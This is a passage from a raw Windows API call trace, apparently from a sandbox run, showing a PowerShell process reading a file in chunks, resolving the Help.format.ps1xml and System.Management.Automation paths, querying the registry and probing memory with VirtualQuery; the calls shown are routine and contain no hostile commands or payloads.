out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.511] GetLastError () returned 0x0 [0029.512] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.512] GetLastError () returned 0x0 [0029.514] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.514] GetLastError () returned 0x0 [0029.514] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.514] GetLastError () returned 0x0 [0029.514] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.514] GetLastError () returned 0x0 [0029.514] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.514] GetLastError () returned 0x0 [0029.514] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.514] GetLastError () returned 0x0 [0029.514] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.514] GetLastError () returned 0x0 [0029.515] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.515] GetLastError () returned 0x0 [0029.515] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.515] GetLastError () returned 0x0 [0029.515] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.515] GetLastError () returned 0x0 [0029.515] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.515] GetLastError () returned 0x0 [0029.515] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.515] GetLastError () returned 0x0 [0029.515] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.515] GetLastError () returned 0x0 [0029.516] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.516] GetLastError () returned 0x0 [0029.516] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.516] GetLastError () returned 0x0 [0029.516] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.516] GetLastError () returned 0x0 [0029.516] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.516] GetLastError () returned 0x0 [0029.520] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.520] GetLastError () returned 0x0 [0029.520] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.520] GetLastError () returned 0x0 [0029.520] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.520] GetLastError () returned 0x0 [0029.520] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.520] GetLastError () returned 0x0 [0029.520] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.520] GetLastError () returned 0x0 [0029.521] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.521] GetLastError () returned 0x0 [0029.521] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.521] GetLastError () returned 0x0 [0029.521] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.521] GetLastError () returned 0x0 [0029.521] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.521] GetLastError () returned 0x0 [0029.521] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.521] GetLastError () returned 0x0 [0029.522] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.522] GetLastError () returned 0x0 [0029.522] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.522] GetLastError () returned 0x0 [0029.522] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.522] GetLastError () returned 0x0 [0029.522] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.522] GetLastError () returned 0x0 [0029.522] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.522] GetLastError () returned 0x0 [0029.522] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.522] GetLastError () returned 0x0 [0029.523] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.523] GetLastError () returned 0x0 [0029.523] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.523] GetLastError () returned 0x0 [0029.523] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.523] GetLastError () returned 0x0 [0029.523] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.523] GetLastError () returned 0x0 [0029.523] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.523] GetLastError () returned 0x0 [0029.524] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.524] GetLastError () returned 0x0 [0029.524] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.524] GetLastError () returned 0x0 [0029.524] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.524] GetLastError () returned 0x0 [0029.524] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.524] GetLastError () returned 0x0 [0029.524] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.524] GetLastError () returned 0x0 [0029.524] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.524] GetLastError () returned 0x0 [0029.525] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.525] GetLastError () returned 0x0 [0029.525] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.525] GetLastError () returned 0x0 [0029.525] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.525] GetLastError () returned 0x0 [0029.525] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0xf37, lpOverlapped=0x0) returned 1 [0029.525] GetLastError () returned 0x0 [0029.525] ReadFile (in: hFile=0x300, lpBuffer=0x2592f23, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x2592f23*, lpNumberOfBytesRead=0x24e6b4*=0x0, lpOverlapped=0x0) returned 1 [0029.525] GetLastError () returned 0x0 [0029.525] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x0, lpOverlapped=0x0) returned 1 [0029.525] GetLastError () returned 0x0 [0029.525] CloseHandle (hObject=0x300) returned 1 [0029.525] GetLastError () returned 0x0 [0029.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e214, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0029.525] GetLastError () returned 0x0 [0029.526] SetErrorMode (uMode=0x1) returned 0x1 [0029.526] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x25b4848 | out: lpFileInformation=0x25b4848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a11027b, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a11027b, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2ed081c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0029.526] GetLastError () returned 0x0 [0029.526] SetErrorMode (uMode=0x1) returned 0x1 [0029.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0029.526] GetLastError () returned 0x0 [0029.526] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e638 | out: phkResult=0x24e638*=0x300) returned 0x0 [0029.526] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e680, lpData=0x0, lpcbData=0x24e67c*=0x0 | out: lpType=0x24e680*=0x1, lpData=0x0, lpcbData=0x24e67c*=0x56) returned 0x0 [0029.526] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e680, lpData=0xd2630, lpcbData=0x24e67c*=0x56 | out: lpType=0x24e680*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24e67c*=0x56) returned 0x0 [0029.526] RegCloseKey (hKey=0x300) returned 0x0 [0029.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0029.526] GetLastError () returned 0x0 [0029.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e174, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0029.526] GetLastError () returned 0x0 [0029.534] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x77f6d6b9, Data2=0x21bb, Data3=0x42c7, Data4=([0]=0x9c, [1]=0xe2, [2]=0x41, [3]=0xd2, [4]=0xae, [5]=0x19, [6]=0x5f, [7]=0x80))) returned 0x0 [0029.534] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x33086fa0, Data2=0xdb0e, Data3=0x4490, Data4=([0]=0x8a, [1]=0xb4, [2]=0x99, [3]=0x13, [4]=0x49, [5]=0x7e, [6]=0x11, [7]=0x59))) returned 0x0 [0029.534] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24df50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0029.534] GetLastError () returned 0x0 [0029.534] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24df00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0029.534] GetLastError () returned 0x0 [0029.534] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24df00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0029.535] GetLastError () returned 0x0 [0029.535] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24df00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0029.535] GetLastError () returned 0x0 [0029.557] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0xac2a3296, Data2=0x5903, Data3=0x44c0, Data4=([0]=0xa8, [1]=0x27, [2]=0xa3, [3]=0xf4, [4]=0x40, [5]=0x9d, [6]=0x58, [7]=0x7a))) returned 0x0 [0029.559] VirtualQuery (in: lpAddress=0x24cff4, lpBuffer=0x24dff4, dwLength=0x1c | out: lpBuffer=0x24dff4*(BaseAddress=0x24c000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.559] VirtualQuery (in: lpAddress=0x24d030, lpBuffer=0x24e030, dwLength=0x1c | out: lpBuffer=0x24e030*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.560] VirtualQuery (in: lpAddress=0x24d360, lpBuffer=0x24e360, dwLength=0x1c | out: lpBuffer=0x24e360*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.560] VirtualQuery (in: lpAddress=0x24d360, lpBuffer=0x24e360, dwLength=0x1c | out: lpBuffer=0x24e360*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.560] VirtualQuery (in: lpAddress=0x24d360, lpBuffer=0x24e360, dwLength=0x1c | out: lpBuffer=0x24e360*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.561] VirtualQuery (in: lpAddress=0x24d2f8, lpBuffer=0x24e2f8, dwLength=0x1c | out: lpBuffer=0x24e2f8*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.561] VirtualQuery (in: lpAddress=0x24d334, lpBuffer=0x24e334, dwLength=0x1c | out: lpBuffer=0x24e334*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.562] VirtualQuery (in: lpAddress=0x24d2f8, lpBuffer=0x24e2f8, dwLength=0x1c | out: lpBuffer=0x24e2f8*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.562] VirtualQuery (in: lpAddress=0x24d334, lpBuffer=0x24e334, dwLength=0x1c | out: lpBuffer=0x24e334*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.562] VirtualQuery (in: lpAddress=0x24d334, lpBuffer=0x24e334, dwLength=0x1c | out: lpBuffer=0x24e334*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.562] VirtualQuery (in: lpAddress=0x24d2f8, lpBuffer=0x24e2f8, dwLength=0x1c | out: lpBuffer=0x24e2f8*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.563] VirtualQuery (in: lpAddress=0x24d334, lpBuffer=0x24e334, dwLength=0x1c | out: lpBuffer=0x24e334*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.563] VirtualQuery (in: lpAddress=0x24d2f8, lpBuffer=0x24e2f8, dwLength=0x1c | out: lpBuffer=0x24e2f8*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.563] VirtualQuery (in: lpAddress=0x24d334, lpBuffer=0x24e334, dwLength=0x1c | out: lpBuffer=0x24e334*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.563] VirtualQuery (in: lpAddress=0x24d2f8, lpBuffer=0x24e2f8, dwLength=0x1c | out: lpBuffer=0x24e2f8*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.564] VirtualQuery (in: lpAddress=0x24d334, lpBuffer=0x24e334, dwLength=0x1c | out: lpBuffer=0x24e334*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.565] VirtualQuery (in: lpAddress=0x24d19c, lpBuffer=0x24e19c, dwLength=0x1c | out: lpBuffer=0x24e19c*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.565] VirtualQuery (in: lpAddress=0x24d2f8, lpBuffer=0x24e2f8, dwLength=0x1c | out: lpBuffer=0x24e2f8*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.566] VirtualQuery (in: lpAddress=0x24d334, lpBuffer=0x24e334, dwLength=0x1c | out: lpBuffer=0x24e334*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.566] VirtualQuery (in: lpAddress=0x24d2f8, lpBuffer=0x24e2f8, dwLength=0x1c | out: lpBuffer=0x24e2f8*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.566] VirtualQuery (in: lpAddress=0x24d334, lpBuffer=0x24e334, dwLength=0x1c | out: lpBuffer=0x24e334*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.566] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0xa8f812d1, Data2=0xb8d9, Data3=0x44c1, Data4=([0]=0xa1, [1]=0xc7, [2]=0x1e, [3]=0x55, [4]=0x5b, [5]=0xe1, [6]=0x65, [7]=0xa))) returned 0x0 [0029.567] VirtualQuery (in: lpAddress=0x24d360, lpBuffer=0x24e360, dwLength=0x1c | out: lpBuffer=0x24e360*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.567] VirtualQuery (in: lpAddress=0x24d360, lpBuffer=0x24e360, dwLength=0x1c | out: 